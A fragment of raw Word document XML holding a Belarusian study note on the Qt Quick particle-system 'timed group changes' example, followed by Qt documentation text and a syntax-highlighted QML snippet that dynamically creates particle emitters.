          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>400</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x</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y</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00B84995"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B84995">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00B84995" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B84995">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B84995" w:rsidRPr="00EB3C12" w:rsidRDefault="007D0655" w:rsidP="00E27D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Прыклад змешчаны ў файле </w:t>
      </w:r>
      <w:hyperlink r:id="rId1852" w:history="1">
        <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-particles-system-content-timedgroupchanges-qml.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ён мне зразумелы. Там ужо клас прамавугольніка змяшчае ў сабе сістэму часцінак. Сістэма часцінак змяшчае тры групы выяўна: </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fire</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>splode</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dead</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. І адну невыяўна – </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>works</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. Як толькі пачынае работаць таймер, то выклікаецца эмітэр </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>startingEmitter</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, які эмітуе часцінкі ў групу </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fire</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. Група файр праз пэўны час пераходзіць у групу </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>splode</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, дзе знаходзіцца </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TrailEmitter</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, які пачынае выпускаць з кожнай часцінкі хвост іншых часцінак. Усе гэтыя часцінкі трапляюць у групу </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>works</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> – і мне незразумела, чаму. Потым гэта група пераходзіць у групу </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dead</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">, якая змяшчае афектар, што аўтаматычна выклікае эмітэр </w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>worksEmitter</w:t>
      </w:r>
      <w:r w:rsidR="00B84995" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EB3C12" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Той выклікае выбух, але як, мне неясна. Я не разумею, як там </w:t>
      </w:r>
      <w:r w:rsidR="00EB3C12" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>velocity</w:t>
      </w:r>
      <w:r w:rsidR="00EB3C12" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> ствараецца… Пры гэтым першапачатковыя часцінкі групаў </w:t>
      </w:r>
      <w:r w:rsidR="00EB3C12" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidR="00EB3C12" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:r w:rsidR="00EB3C12" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dead</w:t>
      </w:r>
      <w:r w:rsidR="00EB3C12" w:rsidRPr="00EB3C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> знікаюць. Заместа іх адбываецца радыяльны выбух.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">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E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1853" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TrailEmitter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>does not suit your needs for multiple emitters, you can also dynamically create Emitters while still using the same</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1854" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticleSystem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and image particle</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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i</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</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i</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E27D73">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj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emitterComp</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createObject</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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</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obj</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x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x</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obj</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y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y</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obj</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targetX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Math</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random</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240</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120</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obj</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x</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obj</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targetY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Math</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random</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240</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120</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obj</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y</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obj</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life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Math</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round</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Math</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random</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2400</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200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73"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obj</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emitRate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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Math</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round</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Math</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random</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32</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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="007945B6" w:rsidRDefault="00E27D73" w:rsidP="00E27D7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E27D73">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007945B6">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:r w:rsidRPr="007945B6">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007945B6">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r w:rsidRPr="007945B6">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
